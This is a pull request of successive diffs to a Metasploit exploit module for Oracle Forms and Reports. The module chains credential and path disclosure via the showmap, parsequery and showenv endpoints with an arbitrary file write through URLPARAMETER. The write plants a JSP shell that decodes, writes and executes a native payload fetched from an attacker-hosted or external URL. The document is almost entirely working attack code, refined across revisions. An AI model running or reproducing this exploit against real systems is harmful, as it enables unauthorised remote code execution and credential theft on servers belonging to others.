### PR TITLE
added module for Oracle Forms and Reports

### DIFF
--- a/modules/exploits/multi/http/oracle_reports_rce.rb
+++ b/modules/exploits/multi/http/oracle_reports_rce.rb
@@ -10,8 +10,8 @@ require 'open-uri'
 class Metasploit3 < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::EXE
   include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::EXE
 
   Rank = GreatRanking
 
@@ -19,13 +19,15 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'            => 'Oracle Forms and Reports',
       'Description'     => %q{
-      This module enumerates possible vulnerable credentials in the /showmap url. Vulnerable credentials can then be used to query
-      the /showenv url for a local filepath that is reachable from an URL. A shell can be uploaded to this path using URLPARAMETER.
-      This allows us to execute arbitrary code on the server. Tested on Linux and Oracle Forms and Reports 11.1.
+      This module uses two vulnerabilities in Oracle forms and reports to get remote code execution on the host. The showmap url combined with parsequery
+      can be used to disclose credentials and information about a server. A second vulnerability that allows arbitrary reading and writing
+      to the host filesystem can then be used to write a shell from a remote url to a known local path disclosed from the previous vulnerability.
+      The local path being accessable from an URL then allows us to perform the remote code execution using for example a .jsp shell.
+      Tested on Linux and Oracle Forms and Reports 11.1.
       },
       'Author'          =>
         [
-          'miss_sudo', # Vulnerability discovery
+          'miss_sudo <security[at]netinfiltration.com>', # Vulnerability discovery
           'Mekanismen <mattias[at]gotroot.eu>' # Metasploit module
         ],
       'License'         => MSF_LICENSE,
@@ -37,12 +39,19 @@ class Metasploit3 < Msf::Exploit::Remote
           [ 'URL', "http://netinfiltration.com" ]
         ],
       'Stance'          => Msf::Exploit::Stance::Aggressive,
+      'Platform'        => ['win', 'linux'],
       'Targets'         =>
         [
-         [ 'Linux',
+          [ 'Linux',
             {
-            'Arch'      => ARCH_JAVA,
-            'Platform'  => 'linux'
+            'Arch' => ARCH_X86,
+            'Platform' => 'linux'
+            }
+          ],
+          [ 'Windows',
+            {
+            'Arch' => ARCH_X86,
+            'Platform' => 'win'
             }
           ],
         ],
@@ -52,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('EXTURL', [false, 'An alternative host to request the payload from', "" ]),
-        OptString.new('OPTDIR', [false, 'An alternative folder to download payload to', "" ]),
+        OptString.new('PAYDIR', [false, 'The folder to download the payload to', "/examples/" ]),
         OptInt.new('HTTPDELAY', [false, 'Time that the HTTP Server will wait for the payload request', 10]),
       ])
   end
@@ -77,15 +86,8 @@ class Metasploit3 < Msf::Exploit::Remote
     @hacked = false
     @payload_url = ""
     @payload_name = rand_text_alpha(8+rand(8)) + ".jsp"
-    @payload_dir = ""
+    @payload_dir = datastore['PAYDIR']
     @local_path = ""
-    @pl = payload.encoded
-
-    if datastore['OPTDIR'].blank?
-      @payload_dir = "/examples/"
-    else
-      @payload_dir = datastore['OPTDIR']
-    end
 
     @url = datastore['RHOST']
     url = "http://" + @url + "/reports/rwservlet/showmap"
@@ -93,37 +95,64 @@ class Metasploit3 < Msf::Exploit::Remote
     begin
     html = uri.open.read
     rescue
-      fail_with(Failure::Unknown, "#{peer} - Unable to access vulnerable URL")
+      fail_with(Failure::Unknown, "#{peer} - target is not vulnerable or unreachable")
     end
 
-    test = html.scan(/<SPAN class=OraInstructionText>(.*)<\/SPAN><\/TD>/).flatten
+    if html.include?("Reports Servlet Key Map")
+      test = html.scan(/<SPAN class=OraInstructionText>(.*)<\/SPAN><\/TD>/).flatten
 
-    #Parse keymaps for servers
-    print_status "#{peer} - Enumerating keymaps ... "
-    uri = target_uri.path
-    test.each do |t|
-      if not @hacked
-        t = t.delete(' ')
-        res = send_request_cgi({
-          'uri' => normalize_uri(uri, "/reports/rwservlet/parsequery?#{t}"),
-          'method' => 'GET',
-        })
-        if res and res.code == 200
-          if res.body =~ /userid=(.*)@/
-            authid = $1
+      #Parse keymaps for servers
+      print_status "#{peer} - Enumerating keymaps ... "
+      uri = target_uri.path
+      test.each do |t|
+        if not @hacked
+          t = t.delete(' ')
+          res = send_request_cgi({
+            'uri' => normalize_uri(uri, "/reports/rwservlet/parsequery?#{t}"),
+            'method' => 'GET',
+          })
+          if res and res.code == 200
+            if res.body =~ /userid=(.*)@/
+              authid = $1
+            end
+            if res.body =~ /server=(\S*)/
+              server = $1
+            end
           end
-          if res.body =~ /server=(\S*)/
-            server = $1
+          if server and authid
+            getenv(server, authid)
           end
-        end
-        if server and authid
-          getenv(server, authid)
         end
       end
-    end
-    if @hacked
     else
-      print_status "#{peer} - Enumeration done ... no vulnerable keymaps for automatic explotation found"
+      fail_with(Failure::Unknown, "#{peer} - target is not vulnerable or unreachable")
+    end
+    unless @hacked
+      print_status "#{peer} - Enumeration done ... no vulnerable keymaps for automatic exploitation found"
+    end
+  end
+
+  def primer
+    @payload_url = get_uri
+    @pl = gen_file_dropper
+    upload_payload
+  end
+
+  def on_request_uri(cli, request)
+    send_response(cli, @pl)
+  end
+
+  def setup_payload
+    if datastore['EXTURL'].blank?
+      begin
+        Timeout.timeout(datastore['HTTPDELAY']) {super}
+      rescue Timeout::Error
+      end
+      exec_payload
+    else
+      @payload_url = datastore['EXTURL']
+      upload_payload
+      exec_payload
     end
   end
 
@@ -144,58 +173,20 @@ class Metasploit3 < Msf::Exploit::Remote
         print_status "#{peer} - Windows install detected "
         print_status "#{peer} - Uploading payload ..."
         @local_path = $1.gsub("\\", "/")
-        local_server_run()
+        setup_payload
       elsif html =~ /\/(.*)\/showenv/
         print_good "#{peer} - Query succeeded!"
         print_status "#{peer} - Linux install detected"
         print_status "#{peer} - Uploading payload ..."
         @local_path = $1
-        local_server_run()
+        setup_payload
       else
         print_status "#{peer} - Query failed"
       end
     end
   end
 
-  def primer
-    @payload_url = get_uri
-    upload_payload
-  end
-
-  def on_request_uri(cli, request)
-    if request.uri =~ /#{get_resource}/
-      send_response(cli, @pl)
-    end
-  end
-
-  def local_server_run()
-    if datastore['EXTURL'].blank?
-      begin
-        Timeout.timeout(datastore['HTTPDELAY']) {super}
-      rescue Timeout::Error
-      end
-      exec_payload
-    else
-      @payload_url = datastore['EXTURL']
-      upload_payload
-      exec_payload
-    end
-  end
-
-  def exec_payload
-    uri = target_uri.path
-
-    print_status("#{peer} - Our payload is at: #{peer}/reports#{@payload_dir}#{@payload_name}")
-    print_status("#{peer} - Executing payload...")
-    url = "/reports#{@payload_dir}#{@payload_name}"
-
-    res = send_request_cgi({
-      'uri' => normalize_uri(uri, url),
-      'method' => 'GET'
-    })
-  end
-
-  def upload_payload()
+  def upload_payload
     path = "/#{@local_path}#{@payload_dir}#{@payload_name}"
 
     uri = target_uri.path
@@ -213,11 +204,52 @@ class Metasploit3 < Msf::Exploit::Remote
       }
     })
 
-    if res.body =~ /Successfully run/
+    if res and res.body.include?("Successfully run")
       @hacked = true
       print_good "#{peer} - Payload uploaded!"
     else
       print_status "#{peer} - Payload upload failed"
     end
+  end
+
+  def gen_file_dropper
+    gen_payload_name   = rand_text_alpha(8+rand(8))
+    encoded_pl  = Rex::Text.encode_base64(generate_payload_exe)
+    print_status "#{peer} - Building JSP shell ..."
+
+    #embed our payload
+    shell  = "<%@ page import=\"java.util.*,java.io.*, sun.misc.BASE64Decoder\"%>"
+    shell += " <%"
+    shell += " BASE64Decoder decoder = new BASE64Decoder();"
+    shell += " byte [] pl = decoder.decodeBuffer(\"#{encoded_pl}\");"
+    #correct file suffix if windows
+    if datastore['TARGET'] == 1
+      shell += " File temp = File.createTempFile(\"#{gen_payload_name}\", \".exe\");"
+    else
+      shell += " File temp = File.createTempFile(\"#{gen_payload_name}\", \".tmp\");"
+    end
+    shell += " String path = temp.getAbsolutePath();"
+    shell += " BufferedOutputStream ou = new BufferedOutputStream(new FileOutputStream(path));"
+    shell += " ou.write(pl);"
+    shell += " ou.close();"
+    #correct rights if linux host
+    if datastore['TARGET'] == 0
+      shell += " Process p = Runtime.getRuntime().exec(\"/bin/chmod 700 \" + path);"
+      shell += " p.waitFor();"
+    end
+    shell += " Runtime.getRuntime().exec(path);"
+    shell += "%>"
+
+    return shell
+  end
+
+  def exec_payload
+    print_status("#{peer} - Our payload is at: #{peer}/reports#{@payload_dir}#{@payload_name}")
+    print_status("#{peer} - Executing payload...")
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, "reports", @payload_dir, @payload_name),
+      'method' => 'GET'
+    })
   end
 end

--- a/modules/exploits/multi/http/oracle_reports_rce.rb
+++ b/modules/exploits/multi/http/oracle_reports_rce.rb
@@ -1,0 +1,223 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'uri'
+require 'open-uri'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Remote::HttpServer::HTML
+
+  Rank = GreatRanking
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'Oracle Forms and Reports',
+      'Description'     => %q{
+      This module enumerates possible vulnerable credentials in the /showmap url. Vulnerable credentials can then be used to query
+      the /showenv url for a local filepath that is reachable from an URL. A shell can be uploaded to this path using URLPARAMETER.
+      This allows us to execute arbitrary code on the server. Tested on Linux and Oracle Forms and Reports 11.1.
+      },
+      'Author'          =>
+        [
+          'miss_sudo', # Vulnerability discovery
+          'Mekanismen <mattias[at]gotroot.eu>' # Metasploit module
+        ],
+      'License'         => MSF_LICENSE,
+      'References'      =>
+        [
+          [ "CVE", "2012-3152" ],
+          [ "CVE", "2012-3153" ],
+          [ "EDB", "31253" ],
+          [ 'URL', "http://netinfiltration.com" ]
+        ],
+      'Stance'          => Msf::Exploit::Stance::Aggressive,
+      'Targets'         =>
+        [
+         [ 'Linux',
+            {
+            'Arch'      => ARCH_JAVA,
+            'Platform'  => 'linux'
+            }
+          ],
+        ],
+      'DefaultTarget'   => 0,
+      'DisclosureDate'  => 'Jan 15 2014'
+    ))
+    register_options(
+      [
+        OptString.new('EXTURL', [false, 'An alternative host to request the payload from', "" ]),
+        OptString.new('OPTDIR', [false, 'An alternative folder to download payload to', "" ]),
+        OptInt.new('HTTPDELAY', [false, 'Time that the HTTP Server will wait for the payload request', 10]),
+      ])
+  end
+
+  def check
+    url = datastore['RHOST']
+    url = "http://" + url + "/reports/rwservlet/showmap"
+    uri = URI.parse(url)
+    begin
+    html = uri.open.read
+    rescue
+      return Exploit::CheckCode::Safe
+    end
+    if html =~ /Reports Servlet Key Map/
+      return Exploit::CheckCode::Appears
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    @hacked = false
+    @payload_url = ""
+    @payload_name = rand_text_alpha(8+rand(8)) + ".jsp"
+    @payload_dir = ""
+    @local_path = ""
+    @pl = payload.encoded
+
+    if datastore['OPTDIR'].blank?
+      @payload_dir = "/examples/"
+    else
+      @payload_dir = datastore['OPTDIR']
+    end
+
+    @url = datastore['RHOST']
+    url = "http://" + @url + "/reports/rwservlet/showmap"
+    uri = URI.parse(url)
+    begin
+    html = uri.open.read
+    rescue
+      fail_with(Failure::Unknown, "#{peer} - Unable to access vulnerable URL")
+    end
+
+    test = html.scan(/<SPAN class=OraInstructionText>(.*)<\/SPAN><\/TD>/).flatten
+
+    #Parse keymaps for servers
+    print_status "#{peer} - Enumerating keymaps ... "
+    uri = target_uri.path
+    test.each do |t|
+      if not @hacked
+        t = t.delete(' ')
+        res = send_request_cgi({
+          'uri' => normalize_uri(uri, "/reports/rwservlet/parsequery?#{t}"),
+          'method' => 'GET',
+        })
+        if res and res.code == 200
+          if res.body =~ /userid=(.*)@/
+            authid = $1
+          end
+          if res.body =~ /server=(\S*)/
+            server = $1
+          end
+        end
+        if server and authid
+          getenv(server, authid)
+        end
+      end
+    end
+    if @hacked
+    else
+      print_status "#{peer} - Enumeration done ... no vulnerable keymaps for automatic explotation found"
+    end
+  end
+
+  def getenv(server, authid)
+    print_good "#{peer} - Found server: #{server}"
+    print_good "#{peer} - Found credentials: #{authid}"
+    print_status "#{peer} - Querying showenv ..."
+
+    url = "http://" + @url + "/reports/rwservlet/showenv?server=#{server}&authid=#{authid}"
+    uri = URI.parse(url)
+    begin
+    html = uri.open.read
+    rescue
+      print_status("#{peer} - Query failed")
+    else
+      if html =~ /\\(.*)\\showenv/
+        print_good "#{peer} - Query succeeded!"
+        print_status "#{peer} - Windows install detected "
+        print_status "#{peer} - Uploading payload ..."
+        @local_path = $1.gsub("\\", "/")
+        local_server_run()
+      elsif html =~ /\/(.*)\/showenv/
+        print_good "#{peer} - Query succeeded!"
+        print_status "#{peer} - Linux install detected"
+        print_status "#{peer} - Uploading payload ..."
+        @local_path = $1
+        local_server_run()
+      else
+        print_status "#{peer} - Query failed"
+      end
+    end
+  end
+
+  def primer
+    @payload_url = get_uri
+    upload_payload
+  end
+
+  def on_request_uri(cli, request)
+    if request.uri =~ /#{get_resource}/
+      send_response(cli, @pl)
+    end
+  end
+
+  def local_server_run()
+    if datastore['EXTURL'].blank?
+      begin
+        Timeout.timeout(datastore['HTTPDELAY']) {super}
+      rescue Timeout::Error
+      end
+      exec_payload
+    else
+      @payload_url = datastore['EXTURL']
+      upload_payload
+      exec_payload
+    end
+  end
+
+  def exec_payload
+    uri = target_uri.path
+
+    print_status("#{peer} - Our payload is at: #{peer}/reports#{@payload_dir}#{@payload_name}")
+    print_status("#{peer} - Executing payload...")
+    url = "/reports#{@payload_dir}#{@payload_name}"
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(uri, url),
+      'method' => 'GET'
+    })
+  end
+
+  def upload_payload()
+    path = "/#{@local_path}#{@payload_dir}#{@payload_name}"
+
+    uri = target_uri.path
+    res = send_request_cgi({
+      'uri' => normalize_uri(uri, "/reports/rwservlet"),
+      'method' => 'GET',
+      'encode_params' => false,
+      'vars_get' => {
+        'report' => 'test.rdf',
+        'desformat' => 'html',
+        'destype' => 'file',
+        'desname' => path,
+        'JOBTYPE' => 'rwurl',
+        'URLPARAMETER' => @payload_url
+      }
+    })
+
+    if res.body =~ /Successfully run/
+      @hacked = true
+      print_good "#{peer} - Payload uploaded!"
+    else
+      print_status "#{peer} - Payload upload failed"
+    end
+  end
+end

--- a/modules/exploits/multi/http/oracle_reports_rce.rb
+++ b/modules/exploits/multi/http/oracle_reports_rce.rb
@@ -67,19 +67,16 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-    url = datastore['RHOST']
-    url = "http://" + url + "/reports/rwservlet/showmap"
-    uri = URI.parse(url)
-    begin
-    html = uri.open.read
-    rescue
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, "/reports/rwservlet/showmap"),
+      'method' => 'GET'
+      })
+
+    unless res and res.body.include?("Reports Services")
       return Exploit::CheckCode::Safe
     end
-    if html =~ /Reports Servlet Key Map/
-      return Exploit::CheckCode::Appears
-    else
-      return Exploit::CheckCode::Safe
-    end
+
+    return Exploit::CheckCode::Appears
   end
 
   def exploit
@@ -89,28 +86,26 @@ class Metasploit3 < Msf::Exploit::Remote
     @payload_dir = datastore['PAYDIR']
     @local_path = ""
 
-    @url = datastore['RHOST']
-    url = "http://" + @url + "/reports/rwservlet/showmap"
-    uri = URI.parse(url)
-    begin
-    html = uri.open.read
-    rescue
-      fail_with(Failure::Unknown, "#{peer} - target is not vulnerable or unreachable")
-    end
+    uri = target_uri.path
+    res = send_request_cgi({
+      'uri' => normalize_uri(uri, "/reports/rwservlet/showmap"),
+      'method' => 'GET'
+      })
 
-    if html.include?("Reports Servlet Key Map")
-      test = html.scan(/<SPAN class=OraInstructionText>(.*)<\/SPAN><\/TD>/).flatten
+    if res and res.body.include?("Reports Services")
+      test = res.body.scan(/<SPAN class=OraInstructionText>(.*)<\/SPAN><\/TD>/).flatten
 
       #Parse keymaps for servers
       print_status "#{peer} - Enumerating keymaps ... "
-      uri = target_uri.path
       test.each do |t|
         if not @hacked
           t = t.delete(' ')
+
           res = send_request_cgi({
             'uri' => normalize_uri(uri, "/reports/rwservlet/parsequery?#{t}"),
             'method' => 'GET',
           })
+
           if res and res.code == 200
             if res.body =~ /userid=(.*)@/
               authid = $1
@@ -161,20 +156,23 @@ class Metasploit3 < Msf::Exploit::Remote
     print_good "#{peer} - Found credentials: #{authid}"
     print_status "#{peer} - Querying showenv ..."
 
-    url = "http://" + @url + "/reports/rwservlet/showenv?server=#{server}&authid=#{authid}"
-    uri = URI.parse(url)
-    begin
-    html = uri.open.read
-    rescue
-      print_status("#{peer} - Query failed")
-    else
-      if html =~ /\\(.*)\\showenv/
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, "/reports/rwservlet/showenv"),
+      'method' => 'GET',
+      'vars_get' => {
+        'server' => server,
+        'authid' => authid
+        }
+      })
+
+    if res and res.code == 200
+      if res.body =~ /\\(.*)\\showenv/
         print_good "#{peer} - Query succeeded!"
         print_status "#{peer} - Windows install detected "
         print_status "#{peer} - Uploading payload ..."
         @local_path = $1.gsub("\\", "/")
         setup_payload
-      elsif html =~ /\/(.*)\/showenv/
+      elsif res.body =~ /\/(.*)\/showenv/
         print_good "#{peer} - Query succeeded!"
         print_status "#{peer} - Linux install detected"
         print_status "#{peer} - Uploading payload ..."
@@ -189,9 +187,8 @@ class Metasploit3 < Msf::Exploit::Remote
   def upload_payload
     path = "/#{@local_path}#{@payload_dir}#{@payload_name}"
 
-    uri = target_uri.path
     res = send_request_cgi({
-      'uri' => normalize_uri(uri, "/reports/rwservlet"),
+      'uri' => normalize_uri(target_uri.path, "/reports/rwservlet"),
       'method' => 'GET',
       'encode_params' => false,
       'vars_get' => {
@@ -201,7 +198,7 @@ class Metasploit3 < Msf::Exploit::Remote
         'desname' => path,
         'JOBTYPE' => 'rwurl',
         'URLPARAMETER' => @payload_url
-      }
+       }
     })
 
     if res and res.body.include?("Successfully run")
@@ -244,12 +241,14 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exec_payload
-    print_status("#{peer} - Our payload is at: #{peer}/reports#{@payload_dir}#{@payload_name}")
-    print_status("#{peer} - Executing payload...")
+    if @hacked
+      print_status("#{peer} - Our payload is at: #{peer}/reports#{@payload_dir}#{@payload_name}")
+      print_status("#{peer} - Executing payload...")
 
-    res = send_request_cgi({
-      'uri' => normalize_uri(target_uri.path, "reports", @payload_dir, @payload_name),
-      'method' => 'GET'
-    })
+      res = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, "reports", @payload_dir, @payload_name),
+        'method' => 'GET'
+      })
+    end
   end
 end

--- a/modules/exploits/multi/http/oracle_reports_rce.rb
+++ b/modules/exploits/multi/http/oracle_reports_rce.rb
@@ -113,6 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote
     @payload_dir = datastore['PAYDIR']
     @local_path = ""
 
+    #show_sploit
     print_status "#{peer} - Querying showenv!"
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, "/reports/rwservlet/showenv"),
@@ -125,33 +126,19 @@ class Metasploit3 < Msf::Exploit::Remote
         print_status "#{peer} - Windows install detected "
         @local_path = $1.gsub("\\", "/")
         print_status "#{peer} - Path: #{@local_path }"
-        setup_payload
       elsif res.body =~ /\/(.*)\/showenv/
         print_good "#{peer} - Query succeeded!"
         print_status "#{peer} - Linux install detected"
         @local_path = $1
         print_status "#{peer} - Path:  #{@local_path }"
-        setup_payload
       else
         print_status "#{peer} - Query failed"
+        fail_with(Failure::Unknown, "#{peer} - target is not vulnerable or unreachable")
       end
     else
       fail_with(Failure::Unknown, "#{peer} - target is not vulnerable or unreachable")
     end
 
-  end
-
-  def primer
-    @payload_url = get_uri
-    @pl = gen_file_dropper
-    upload_payload
-  end
-
-  def on_request_uri(cli, request)
-    send_response(cli, @pl)
-  end
-
-  def setup_payload
     if datastore['EXTURL'].blank?
       print_status "#{peer} - Hosting payload locally ..."
       begin
@@ -165,6 +152,16 @@ class Metasploit3 < Msf::Exploit::Remote
       upload_payload
       exec_payload
     end
+  end
+
+  def primer
+    @payload_url = get_uri
+    @pl = gen_file_dropper
+    upload_payload
+  end
+
+  def on_request_uri(cli, request)
+    send_response(cli, @pl)
   end
 
   def upload_payload
@@ -246,7 +243,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exec_payload
-    print_status("#{peer} - Our payload is at: #{peer}/reports#{@payload_dir}#{@payload_name}")
+    print_status("#{peer} - Our payload is at: /reports#{@payload_dir}#{@payload_name}")
     print_status("#{peer} - Executing payload...")
 
     res = send_request_cgi({

--- a/modules/exploits/multi/http/oracle_reports_rce.rb
+++ b/modules/exploits/multi/http/oracle_reports_rce.rb
@@ -73,12 +73,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
     if res and res.code == 200
       if res.body =~ /\\(.*)\\showenv/
-        print_good "#{peer} - Windows install detected "
+        vprint_good "#{peer} - Windows install detected "
         path = $1.gsub("\\", "/")
-        print_status "#{peer} - Path:  #{path}"
+        vprint_status "#{peer} - Path:  #{path}"
       elsif res.body =~ /\/(.*)\/showenv/
-        print_good "#{peer} - Linux install detected"
-        print_status "#{peer} - Path:  #{$1}"
+        vprint_good "#{peer} - Linux install detected"
+        vprint_status "#{peer} - Path:  #{$1}"
       else
         return Exploit::CheckCode::Safe
       end
@@ -97,10 +97,10 @@ class Metasploit3 < Msf::Exploit::Remote
       })
 
     if res and res.code == 200 and res.body.downcase.exclude?("<html>")
-        print_good "#{peer} - URLPARAMETER is vulnerable"
-        return Exploit::CheckCode::Appears
+      vprint_good "#{peer} - URLPARAMETER is vulnerable"
+      return Exploit::CheckCode::Vulnerable
     else
-      print_status "#{peer} - URLPARAMETER is not vulnerable"
+      vprint_status "#{peer} - URLPARAMETER is not vulnerable"
       return Exploit::CheckCode::Safe
     end
 
@@ -113,7 +113,6 @@ class Metasploit3 < Msf::Exploit::Remote
     @payload_dir = datastore['PAYDIR']
     @local_path = ""
 
-    #show_sploit
     print_status "#{peer} - Querying showenv!"
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, "/reports/rwservlet/showenv"),

--- a/modules/exploits/multi/http/oracle_reports_rce.rb
+++ b/modules/exploits/multi/http/oracle_reports_rce.rb
@@ -5,7 +5,6 @@
 
 require 'msf/core'
 require 'uri'
-require 'open-uri'
 
 class Metasploit3 < Msf::Exploit::Remote
 
@@ -17,13 +16,13 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'            => 'Oracle Forms and Reports',
+      'Name'            => 'Oracle Forms and Reports RCE',
       'Description'     => %q{
-      This module uses two vulnerabilities in Oracle forms and reports to get remote code execution on the host. The showmap url combined with parsequery
-      can be used to disclose credentials and information about a server. A second vulnerability that allows arbitrary reading and writing
+      This module uses two vulnerabilities in Oracle forms and reports to get remote code execution on the host. The showenv url can be used to disclose
+      information about a server. A second vulnerability that allows arbitrary reading and writing
       to the host filesystem can then be used to write a shell from a remote url to a known local path disclosed from the previous vulnerability.
       The local path being accessable from an URL then allows us to perform the remote code execution using for example a .jsp shell.
-      Tested on Linux and Oracle Forms and Reports 11.1.
+      Tested on Windows and Oracle Forms and Reports 10.1.
       },
       'Author'          =>
         [
@@ -61,81 +60,85 @@ class Metasploit3 < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('EXTURL', [false, 'An external host to request the payload from', "" ]),
-        OptString.new('PAYDIR', [true, 'The folder to download the payload to', "/examples/" ]),
-        OptString.new('ALTPATH', [false, 'Skip enumeration and use this known local path', ""]),
+        OptString.new('PAYDIR', [true, 'The folder to download the payload to', "/images/" ]),
         OptInt.new('HTTPDELAY', [false, 'Time that the HTTP Server will wait for the payload request', 10]),
       ])
   end
 
   def check
     res = send_request_cgi({
-      'uri' => normalize_uri(target_uri.path, "/reports/rwservlet/showmap"),
+      'uri' => normalize_uri(target_uri.path, "/reports/rwservlet/showenv"),
       'method' => 'GET'
       })
 
-    unless res and res.body.include?("Reports Services")
+    if res and res.code == 200
+      if res.body =~ /\\(.*)\\showenv/
+        print_good "#{peer} - Windows install detected "
+        path = $1.gsub("\\", "/")
+        print_status "#{peer} - Path:  #{path}"
+      elsif res.body =~ /\/(.*)\/showenv/
+        print_good "#{peer} - Linux install detected"
+        print_status "#{peer} - Path:  #{$1}"
+      else
+        return Exploit::CheckCode::Safe
+      end
+    end
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, "/reports/rwservlet"),
+      'method' => 'GET',
+       'vars_get' => {
+       'report' => 'test.rdf',
+       'desformat' => 'html',
+       'destype' => 'cache',
+       'JOBTYPE' => 'rwurl',
+       'URLPARAMETER' => 'file:///'
+       }
+      })
+
+    if res and res.code == 200 and res.body.downcase.exclude?("<html>")
+        print_good "#{peer} - URLPARAMETER is vulnerable"
+        return Exploit::CheckCode::Appears
+    else
+      print_status "#{peer} - URLPARAMETER is not vulnerable"
       return Exploit::CheckCode::Safe
     end
 
-    return Exploit::CheckCode::Appears
+  return Exploit::CheckCode::Safe
   end
 
   def exploit
-    @hacked = false
     @payload_url = ""
     @payload_name = rand_text_alpha(8+rand(8)) + ".jsp"
     @payload_dir = datastore['PAYDIR']
     @local_path = ""
 
-    uri = target_uri.path
+    print_status "#{peer} - Querying showenv!"
     res = send_request_cgi({
-      'uri' => normalize_uri(uri, "/reports/rwservlet/showmap"),
-      'method' => 'GET'
+      'uri' => normalize_uri(target_uri.path, "/reports/rwservlet/showenv"),
+      'method' => 'GET',
       })
 
-    if res and res.body.include?("Reports Services")
-      #skip enum for known localpath?
-      if datastore['ALTPATH'].blank?
-        test = res.body.scan(/<SPAN class=OraInstructionText>(.*)<\/SPAN><\/TD>/).flatten
-
-        #Parse keymaps for servers
-        print_status "#{peer} - Enumerating keymaps ... "
-        test.each do |t|
-          if not @hacked
-            t = t.delete(' ')
-
-            res = send_request_cgi({
-              'uri' => normalize_uri(uri, "/reports/rwservlet/parsequery?#{t}"),
-              'method' => 'GET',
-            })
-
-            if res and res.code == 200
-              if res.body =~ /userid=(.*)@/
-                authid = $1
-              end
-              if res.body =~ /server=(\S*)/
-                server = $1
-              end
-            end
-            if server and authid
-              #remove potential leftovers
-              authid = authid.gsub("\"", "")
-              server = server.gsub("\"", "")
-              getenv(server, authid)
-            end
-          end
-        end
-      else
-        print_status "#{peer} - Skipping enumeration and using supplied local path"
-        @local_path = datastore['ALTPATH']
+    if res and res.code == 200
+      if res.body =~ /\\(.*)\\showenv/
+        print_good "#{peer} - Query succeeded!"
+        print_status "#{peer} - Windows install detected "
+        @local_path = $1.gsub("\\", "/")
+        print_status "#{peer} - Path: #{@local_path }"
         setup_payload
+      elsif res.body =~ /\/(.*)\/showenv/
+        print_good "#{peer} - Query succeeded!"
+        print_status "#{peer} - Linux install detected"
+        @local_path = $1
+        print_status "#{peer} - Path:  #{@local_path }"
+        setup_payload
+      else
+        print_status "#{peer} - Query failed"
       end
     else
       fail_with(Failure::Unknown, "#{peer} - target is not vulnerable or unreachable")
     end
-    unless @hacked
-      print_status "#{peer} - Enumeration done ... no vulnerable keymaps for automatic exploitation found"
-    end
+
   end
 
   def primer
@@ -150,54 +153,23 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def setup_payload
     if datastore['EXTURL'].blank?
+      print_status "#{peer} - Hosting payload locally ..."
       begin
         Timeout.timeout(datastore['HTTPDELAY']) {super}
       rescue Timeout::Error
       end
       exec_payload
     else
+      print_status "#{peer} - Using external url for payload delivery ..."
       @payload_url = datastore['EXTURL']
       upload_payload
       exec_payload
     end
   end
 
-  def getenv(server, authid)
-    print_good "#{peer} - Found server: #{server}"
-    print_good "#{peer} - Found credentials: #{authid}"
-    print_status "#{peer} - Querying showenv ..."
-
-    res = send_request_cgi({
-      'uri' => normalize_uri(target_uri.path, "/reports/rwservlet/showenv"),
-      'method' => 'GET',
-      'vars_get' => {
-        'server' => server,
-        'authid' => authid
-        }
-      })
-
-    if res and res.code == 200
-      if res.body =~ /\\(.*)\\showenv/
-        print_good "#{peer} - Query succeeded!"
-        print_status "#{peer} - Windows install detected "
-        print_status "#{peer} - Uploading payload ..."
-        @local_path = $1.gsub("\\", "/")
-        setup_payload
-      elsif res.body =~ /\/(.*)\/showenv/
-        print_good "#{peer} - Query succeeded!"
-        print_status "#{peer} - Linux install detected"
-        print_status "#{peer} - Uploading payload ..."
-        @local_path = $1
-        setup_payload
-      else
-        print_status "#{peer} - Query failed"
-      end
-    end
-  end
-
   def upload_payload
+    print_status "#{peer} - Uploading payload ..."
     path = "/#{@local_path}#{@payload_dir}#{@payload_name}"
-
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, "/reports/rwservlet"),
       'method' => 'GET',
@@ -212,24 +184,32 @@ class Metasploit3 < Msf::Exploit::Remote
        }
     })
 
-    if res and res.body.include?("Successfully run")
-      @hacked = true
-      print_good "#{peer} - Payload uploaded!"
+    if res and res.code == 200
+      print_good "#{peer} - Payload hopefully uploaded!"
     else
       print_status "#{peer} - Payload upload failed"
     end
   end
 
   def gen_file_dropper
-    gen_payload_name   = rand_text_alpha(8+rand(8))
+    big_payload =  false #size matters :(
+
+    gen_payload_name  = rand_text_alpha(8+rand(8))
     encoded_pl  = Rex::Text.encode_base64(generate_payload_exe)
     print_status "#{peer} - Building JSP shell ..."
+
+    len = encoded_pl.length
+    if len >= 60000 #java string size limit ~60k workaround
+      print_status "#{peer} - Adjusting shell due to payload size"
+      pl_first = encoded_pl.slice(0, 60000)
+      pl_second = encoded_pl.slice(60000, len)
+      big_payload = true
+    end
 
     #embed our payload
     shell  = "<%@ page import=\"java.util.*,java.io.*, sun.misc.BASE64Decoder\"%>"
     shell += " <%"
     shell += " BASE64Decoder decoder = new BASE64Decoder();"
